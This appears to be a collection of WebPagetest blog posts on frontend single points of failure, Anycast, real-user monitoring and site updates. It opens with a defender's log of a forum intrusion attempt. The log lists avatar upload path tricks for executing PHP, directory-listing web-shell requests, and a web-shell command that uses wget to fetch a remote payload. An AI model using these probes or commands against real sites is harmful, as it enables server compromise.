http://www.webpagetest.org/forums/member.php?action=profile&uid=27633
06:21 - Activated his registration
209.73.132.37 (switched to another IP to continue manual debugging/activity)
06:29 - Accesses forum using new registration (normal forum browsing, a couple of failed post attempts)
06:31 - Tries to access the admin control panel /forums/admincp (404)
06:35 - Logs out of the forum
06:38 - Tries manually loading various attachments with different attempts to obfuscate the path
06:42 - Tries (unsuccessfully) php execution for attachments /forums/attachment.php?aid=175/.php
06:44 - Tries the old avatar routine again /forums/uploads/avatars/avatar_9.jpg/.php
06:48 - Attempts various probings to see if any other extensions will potentially execute:
/forums/uploads/avatars/avatar_9.jpg?/.s
/forums/uploads/avatars/avatar_9.jpg/.s
/forums/uploads/avatars/avatar_9.jpg?/.hoohl
/forums/uploads/avatars/avatar_9.jpg?/.txt
/forums/uploads/avatars/avatar_9.jpg?/.jsp
/forums/uploads/avatars/avatar_9.jpg/.jsp
/forums/uploads/avatars/avatar_9.jpg/.pdf
/forums/uploads/avatars/avatar_9.jpg/.bin
/forums/uploads/avatars/avatar_9.jpg/.yahoo
/forums/uploads/avatars/avatar_9.jpg/.fucked
/forums/uploads/avatars/avatar_9.jpg/.:(
/forums/uploads/avatars/avatar_9.jpg/.p%20hp
/forums/uploads/avatars/avatar_9.jpg/.avatar_9.p%20hp
06:50 - Tries some of the old files again for some reason:
/forums/uploads/avatars/sys.php
/forums/uploads/avatars/system1.php?dir=%2Fvar%2Fwww%2Fwebpagetest.org%2Fforums%2Fuploads%2Favatars%2Fcsheck.php
06:52 - Tries to use the avatar hack to download his payload again
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php?c=wget%20http://dl.dropbox.com/u/xxxxxxx/gs.php
06:54 - More futile attempts to probe the avatars directory and understand why things aren't working:
/forums/uploads/avatars/upper.php
/forums/uploads/avatars/php
/forums/uploads/avatars/.php (ding, if he didn't know by now, nothing with .php anywhere inside of uploads will load)
06:55 - Seriously, he is expecting different results?
/forums/uploads/avatars/system1.php?dir=%2Fvar%2Fwww%2Fwebpagetest.org%2Fforums%2F
06:56 - He does some MORE poking around to see if the trailing .php hack is universally blocked (it is now)
/forums/images/smilies/tongue.gif/.php
07:00 - Last trace of access for today
Steve Souders had a great blog post last year that talked about Frontend Single Points Of Failure (SPOF). Given the continuing rise in 3rd-party widgets on pages it is becoming increasingly important and I realized that there weren't any good tools for testing for it. Seemed like the perfect opportunity to piece something together so that's exactly what I did.
Testing for Frontend SPOF
Probably the most critical part of testing a failure of a 3rd-party widget is to make sure you get the failure mode correct. When these things fail, the servers usually become unreachable and requests time out. It is important to replicate that behavior and not have the requests fail quickly, otherwise you will see what your site looks like without the content but the experience won't be right (the real experience is Sooooooo much worse).
I looked around for a well-known public blackhole server but couldn't find one so I went ahead and set one up (feel free to use it for your testing as well):
blackhole.webpagetest.org (aka 72.66.115.13)
A blackhole server is a server that can be routed to but all traffic gets dropped on the floor so it behaves exactly like we want when testing the failure mode for 3rd-party widgets.
With the blackhole server up and running you can now use it for testing manually or through tools like Webpagetest.
Browsing the broken web
For the purposes of this example I'll be "breaking" the twitter, Facebook and Google buttons as well as the Google API server (jquery, etc) and Google Analytics.
Now that we have a blackhole server, breaking the web is just a matter of populating some entries in your hosts file (C:\Windows\System32\drivers\etc\hosts on windows). Go ahead and add these entries and save the updated hosts file:
72.66.115.13 ajax.googleapis.com
72.66.115.13 apis.google.com
72.66.115.13 www.google-analytics.com
72.66.115.13 connect.facebook.net
72.66.115.13 platform.twitter.com
...and go browse the web. It shouldn't take you long to find a site that is infuriatingly painful to browse. Congratulations, you just experienced a Frontend SPOF - now go fix it so your users don't have to feel the same pain (assuming it is a site you control, otherwise just yell at the owner).
Testing it with WebPagetest
It's a lot easier to discover broken content just by browsing using the hosts file method, but if you find something and need to make the case to someone to get it fixed, nothing works better than a WebPagetest video.
First, test the site as you normally would but make sure to check the "capture video" option (and it's probably not a bad idea to also give it a friendly label).
Next, to capture the broken version of the site you will need to use a script (largely just copy and paste). You need to send the broken domains to the blackhole and then visit the page you are trying to test:
setDnsName ajax.googleapis.com blackhole.webpagetest.org
setDnsName apis.google.com blackhole.webpagetest.org
setDnsName www.google-analytics.com blackhole.webpagetest.org
setDnsName connect.facebook.net blackhole.webpagetest.org
setDnsName platform.twitter.com blackhole.webpagetest.org
Just paste the script into the script box (with the correct URL to be tested), make sure capture video is checked and that you have a friendly label on the test.
Finally, go look at the test history, select the tests that you ran and click compare (the history works best if you log into the site before submitting your tests).
And what would be the fun in it without an example. Here is what happens to Business Insider when Twitter goes down (yeah, THAT never happens):
http://www.webpagetest.org/video/view.php?id=111011_4e0708d3caa23b21a798cc01d0fdb7882a735a7d
Yeah, so it's normally pretty slow but when Twitter goes down the user stares at a blank white screen for 20 seconds! At that point, Business Insider itself may as well be down. Luckily it can easily be solved just by loading the twitter button asynchronously.
Every now and then the topic of Anycast comes up in the context of web performance so I thought I’d take a stab at explaining what it is and the benefits.
tl;dr – DNS servers should always be Anycast (and even some of the largest CDN’s are not so don’t just assume you are covered). Anycast for the web servers/CDN is great if you can pull it off but it’s a lot less common than DNS.
Anycast – the basics
Each server on a network (like the Internet) is usually assigned an address and each address is usually assigned to a single server. Anycast is when you assign the same address to multiple servers and use routing configurations to make sure traffic is routed to the correct server. On private networks where there is no overlap this is pretty easy to manage (just don’t route the Anycast addresses out of the closed network). On the public Internet things are somewhat more complicated since routes change regularly so a given machine could end up talking to different servers at different points in time as routing changes happen on the Internet (congested links, outages, and for hundreds of other reasons).
The routing behavior on a network as large as the Internet means Anycast is not a good fit for stateful long-lived connections but stateless protocols or protocols that recover well can still work. Luckily for the web, the two foundational protocols for web traffic are largely stateless (DNS and HTTP).
DNS Anycast
By far, the most common use for Anycast on the Internet is for DNS (servers and relays). To provide fast DNS response times for users across the globe you need to distribute your authoritative DNS servers (and users need to use DNS relays/servers close to them).
One way to distribute your servers is to give each one a unique address and just list them all as authoritative servers for your domain. Intermediate servers running Bind 8 will try them all and favor the fastest ones but it will still use the slower ones for some percentage of traffic. Bind 9 (last I checked anyway) changed the behavior and no longer favors the fastest so you will end up with a mix of slow and fast responses for all users.
Using Anycast you would distribute your servers globally and give them all the same IP address and you would list a single address (or a couple of Anycast addresses for redundancy) as the authoritative servers for your domain. When a user goes to look up your domain, their DNS relay/server would always get routed to your best authoritative server (by network path, not necessarily physical geography). Since DNS is just a request/response protocol over UDP, it really doesn’t matter if they end up talking to different physical servers for different requests.
So, as long as the routing is managed correctly, DNS Anycast is ALWAYS better than other solutions for a distributed DNS serving infrastructure (at least for performance reasons). You should make sure that you are using Anycast DNS for moth your own records as well as any CDNs you might leverage. It works for both the authoritative servers as well as DNS relays that users might use. Google’s public DNS servers for end users are globally distributes but use the Anycast addresses of 8.8.8.8 and 8.8.4.4 so you will always get the fastest DNS performance regardless of where you are and what network you are on.
HTTP Anycast
Even though HTTP is not as stateless as DNS (TCP connections need to be negotiated and maintained), the connections live for a short enough time that Anycast can also work really well for HTTP – though it requires more control over the network to keep routing changes to a minimum.
Typically, geo-distribution of web servers is done by assigning them different IP addresses and then relying on geo-locating DNS to route users to the server closest to them. It usually works well enough but there are some fairly big gotchas:
- The geo-locating DNS server actually sees the address of the user’s DNS server, not the user themselves so it can only provide the server closest to the user’s DNS – not necessarily the user (there is a spec update to relay the actual user IP through in DNS requests so this can be done more accurately).
- The geo-locating is only as good as the knowledge that the service has about which web servers are closest to the user’s DNS servers. It usually works well but it’s not uncommon to see traffic routed to servers that are far away.
- The Time To Live (TTL) on the DNS responses is usually really short (60 seconds) so that dead or overloaded servers can be pulled out as needed. This effectively means that the DNS records can’t be cached by the user’s DNS servers and the requests all have to go back to the authoritative servers.
With Anycast, servers can be deployed globally with the same IP address. When it works well it addresses all of the issues that using DNS to geo-locate has:
- DNS can reply with the same IP address for all users and the address can have a long TTL and be cached by intermediate DNS resolvers.
- In the case of a CDN, you can even assign the Anycast address directly as an A record and avoid the extra step of a CNAME lookup.
- You don’t need to know where the user is. Routing will take care of bringing the user to the closest server regardless of where they or their DNS server are located.
- If you need to take a server offline, you adjust the routing so that traffic goes to the next best physical server.
I’m glossing over a LOT of the complexity in actually managing an Anycast network on the public internet but
assuming you (or your provider) can pull it off, Anycast can be a huge win for HTTP performance as well.
All that said, there are only a few implementations that I am aware of for using Anycast for HTTP (and they are all CDN providers). Anycast for HTTP should not be the main focus when picking a CDN since there are a lot of other important factors – the most important of which is to make sure they actually have edge nodes near your users (if you have a lot of users in Australia then pick a provider with edge nodes in Australia FIRST, then compare other features).
It hasn't happened yet but it's a question of when, not if active monitoring of websites for availability and performance will be obsolete. My prediction is that it will happen in the next 5 years though if everything lines up it could be as soon as 2 years away.
By active monitoring I am referring to testing a website on a regular interval and potentially from several locations to see if it is working and how long it takes to load (and bundled in with that the alarming, reporting, etc. that goes with it).
Active monitoring has some pretty strong benefits over any alternatives right now:
- Rich debugging information (resource-level timing, full access to headers and network-level diagnostics)
- Consistency - the test conditions do not vary from one test to the next so there is minimal "noise"
- Predictability - you control the frequency and timing of the tests
- Low-latency alerting - you can get notified within minutes of an event/issue (assuming it is detected)
But it's not all sunshine and roses:
- You only have visibility into the systems/pages that you test (which is usually a TINY fraction of what your users actually use)
- It's expensive. You usually end up picking a few key pages/systems to monitor to keep costs under control
- The more you test, the more load you put on the systems you are monitoring (capacity that should be going to serve your users)
- You can only test from a "representative" set of locations, not everywhere your users actually visit from. This may not seem important if you only serve content from one location, but do you use a CDN? Do you serve ads or use 3rd-party widgets that are served from a CDN? If so then there is no way that you are actually able to test every path your users use to get your content
- The performance is never representative of what the users see. Usually monitoring is done from backbone connections that are close to CDN POPs. Even if you spring for testing on real end-user connections ($$$$) you have to pick a small subset of connection types. You users visit from office connections, home ISP connections, mobile, satellite and over various different connections even within the house.
So, none of this is new, why now and what is going to replace it?
There are several different advances that are converging that will make it possible to collect, report and act on REAL end user data (
Real
User
Monitoring - RUM). There are several issues with using data from the field but between advances in the browsers and Big Data they are on the verge of being solved:
First off, getting the rich diagnostic information from the field. Monitoring is useless if you can't identify the cause of a problem and historically you have had very little insight into what is going on inside of a browser. That all started to change last year when the
W3C Web Performance Working Group formed. They are working on defining standards for browser to expose rich diagnostic/timing information to the pages. The first spec that has been implemented is the
Navigation Timing standard which exposes information at a page-level about the timings of various browser actions. The Navigation Timing spec has already been implemented in IE9 and Chrome and will be coming soon in the other major browsers. Even more interesting will be the
Resource Timing standard which will expose information about every resource that is loaded.
HTML5 also opens up the possibility to store data in local storage in the case where a failure can't be reported (to allow for it to be reported later) and for pages that leverage the Application Cache you can even run completely offline and detect failures to reach the site in the first place.
OK, so we will be able to get the rich diagnostics from the field (and collect data from the real user sessions so you get coverage on everything the users do on your site, from everywhere they visit, etc) - that's a lot of data, what do you do with it?
Big Data to the rescue. Data storage and analysis for huge data sets has started to explode. Primarily driven by
hadoop but there are tons of commercial companies and services entering the space. It's already possible to store, process and analyze petabytes (and more) very efficiently and things are only going to improve. We are quickly evolving towards a world where we
collect everything and then slice and dice it later. That's pretty much exactly what you need to do with field data to investigate trends or dig into issues.
Why 2-5 years and not now?
Adoption.
Browsers that support the new standards will take a while to reach critical mass (and the Resource timing spec isn't defined yet). There are also no services or toolkits yet that do good field monitoring so it will take a while for those to evolve and mature.
I'm curious to see if the traditional beacon services (omniture, comscore, etc) step into this space, if the traditional monitoring providers adapt or if a new breed of startups catches them all off guard. I am a little surprised that most of the participation in the standards process is coming from the browser vendors themselves trying to anticipate how the data would be used - I'd expect to see more of the monitoring services playing an active role if it was on their radar.
Well, I've been promising to do it for a while and it's finally ready. If you've ever wondered what the facility looks like that runs the Dulles test location for WebPagetest (and soon the Web Server), here you go...
First up, here is the secure entrance to the cage securely below ground level in case of tornados or other such craziness (yes, in case you're wondering - my basement).
Here are the physical machines grinding away day and night running your tests. They are co-located with the "climate and humidity control system" (furnace). The unRAID file server is completely unrelated to WebPagetest, it just happens to be sitting there (and I'm a huge fan of the technology - I can RAID a massive array of disks but only the disk being accessed at a given time spins up so it's great for power consumption).
Around the corner we have the brand-spanking-new web server that will be running WebPagetest.org (among other random personal sites). The Voip converter just happens to be there because that's where my phone line comes in and it's great for blocking telemarketers and keeping the phone from ringing when the kids are sleeping.
Finally, we have the heart of the data center tour, the network that pulls it all together. I've been completely spoiled by FIOS. Seriously low latency high bandwidth connectivity right to the home. The bulk of that wiring is really just my house and random devices (yes, all of the plugged in ports are live - everything has a network connection these days). The BSD router is overkill these days. It was there originally because the traffic shaping was done there but now that it has moved into the testers themselves I need to get around to replacing it with something a little less power hungry.
And there you have it. The Meenan Data Center in all it's glory!
This is what open source is all about!
Today we are taking the first step in combining the optimization checks done by Page Speed and WebPagetest by making the Page Speed results available from within WebPagetest (and from an IE browser for the first time). Huge thanks go out to the Page Speed team and Bryan McQuade in particular who did the bulk of the work getting it integrated into the Pagetest browser plugin (as well as Steve Souders for encouraging us to collaborate).
What You Will See
In your test results you will now be getting your Page Speed score along with the normal optimization checks that are done by WebPagetest:
Clicking on the link will take you to the
details from Page Speed about the various checks and what needs to be fixed:
What's next?
As I mentioned, this is just the first step. The long-term plans are to take the best of both tools, enhance the Page Speed checks and standardize on Page Speed for optimization checking. You'll probably see the individual rules start to migrate slowly (with things like gzip and caching being no-brainers since the logic is essentially identical between the two tools) so it should be pretty seamless from the end-user perspective. You will also see the Page Speed checks enhanced to include the DOM-based checks that you're used to seeing in the Firefox plugin.
If you've been over to
WebPagetest today you may have noticed that things have changed a bit (after you double-checked to make sure you were really at the correct site). Thanks to
Neustar Webmetrics (and
Lenny Rachitsky in particular) for kicking in an actual designer to bring the UI out of the dark ages hopefully performance testing will be less intimidating to new users while still keeping all of the functionality that the more advanced users like. All of the existing functionality is still there (with very similar navigation) but there are a few enhancements I managed to get in with the update as well...
Feeds
Right at the bottom of the site (across all of the pages) is a blogroll (left column) of performance-focused blogs and a feed of recent discussions (right column) that pulls from the WebPagetest forums, the Yahoo Exceptional Performance group and the "Make the Web Faster" Google group. If you have a blog that you would like included (that is focused on web performance)
shoot it to me and I'll get it added to the feed.
Simplified Navigation
There used to be 3 separate "landing" pages. One with some high-level information, one for testing individual pages and one for running visual comparisons. All three have been collapsed into a single page.
New Performance Documentation Wiki
There are a lot of discussions in the forums that end up with really valuable information on how to fix something (keep-alives being broken for IE on Apache comes up frequently). I decided to set up a new destination to serve as a place to document these findings as well as serve as a central repository for performance knowledge.
Web Performance Central is an open wiki for the community to contribute to the knowledge base of performance. I will be hosting my documentation there and it is open for anyone else to do the same and hopefully we can start getting a reasonable knowledge base built (it's really bare right now - mostly just the site).
I'll commit to running the site without any branding and with no advertising so it can be a completely unbiased source for performance information.
More Prominent Grades
The grades for the key optimizations are now across the top of all of the results pages and clicking on any of them will take you to the list of requests/objects that caused the failure. Eventually when the documentation is in place I hope to also link the labels to information on how to fix the problem.
Social Sharing
I also bit the bullet and added a 3rd party widgit to make it easier to share results. It saves a couple of steps and makes it a lot easier to tweet things like "Wow, site X is painfully slow", etc. I was a little torn because the addthis widget messes up the layout of the page a little bit in IE7 and below but let's face it, I don't expect that the target demographic for WebPagetest would be using outdated browsers so it was a tradeoff I was willing to make.
New Logo
I'm not a graphic designer by any stretch of the imagination and the UI designer provided the basis for the new logo but I wanted something that had a transparent background and that I could modify myself so I went and created a new one. I HIGHLY recommend
Inkscape for those that haven't tried it. It is a free (open source) vector drawing program that is used even by a lot of professional designers. I managed to whip together the logo in a few minutes and create it in various different sizes (as well as a favicon) all from the same source (ahh, the beauty of vector graphics).
Finally, as a bonus for making it this far, there is an Easter egg in the new UI that lets you change the color scheme if you don't like the blue background. Just pass a hex color code in as a query parameter and you can use whatever color you want (with the logo auto-switching from white to black as needed). Here are some to get you started:
The original color scheme provided by the designer:
http://www.webpagetest.org/?color=f1c52e
Green:
http://www.webpagetest.org/?color=005030
Black:
http://www.webpagetest.org/?color=000000
White:
http://www.webpagetest.org/?color=ffffff
Orange:
http://www.webpagetest.org/?color=f47321
The color will stick until you clear your cookies or manually reset it. To reset it to the default just pass an invalid color:
http://www.webpagetest.org/?color=0
As always, feel free to send me any feedback, suggestions or questions.
Europe is definitely a hotspot for interest in web performance (WebPagetest sees almost as much traffic from there as the US). A huge "thank you" goes out to Aaron Peters who volunteered to expand our European testing footprint with a location in Amsterdam.
For an inaugural run, he ran some tests of the top online merchants in The Netherlands (according to Twinkle magazine) and from the looks of it there's quite a market need for Web Performance Optimization experts in the area.
(click on any of the urls to go to the test results for that page)
thomascook.nl - wow! poster-child material. Failures across the board with no persistent connections, caching, compression, nothing. It's actually amazing that it managed to load in 12 seconds at all.
www.wehkamp.nl - Non too bad on the standard things but a crazy number of javascript and css files in the head (and no caching) so a pretty poor user experience. A couple of tweaks could cut the load time in half and significantly speed up the start render time.
www.arke.nl - Apparently caching is passé - yet another site that doesn't like to use expires headers but what really surprised be was the 222KB of css that is being delivered without any compression. Both the sheer amount of CSS and the fact that it isn't compressed are pretty scary.
www.bol.com - Pretty much just got the keep-alives right. No compression, no caching, and a bunch of js/css files that need to be merged.
www.transavia.com - Yay, someone is actually compressing their javascript! Just a shame they have so much of it (150KB compressed) and in so many different files and wow, a 209KB png that should easily be an 8-bit (and MUCH smaller image).
www.oad.nl - And now we're back to the really low bar of failures across the board (including persistent connections) and a couple of 404's for good measure.
www.dell.nl - Dell did a reasonable job (though to be fair, it's probably a global template) and it's not a very rich landing page but they could still get quite a bit of improvement with image sprites and delaying the javascript.
www.cheaptickets.nl - Do I sound like a broken record yet? Other than persistent connections - epic fail!
www.d-reizen.nl - In DESPERATE need of some SpriteMe love (in addition to the usual suspects).
The sad part is that with just a couple of minutes of work every one of these sites could load in half the time and present a MUCH better user experience. We've already seen time and time again that conversions, sales, etc all increase substantially with improved page performance and as I see over and over again, the vast majority of sites aren't even taking the five-minutes to handle the absolute basics (most of which can be done just with configuration changes).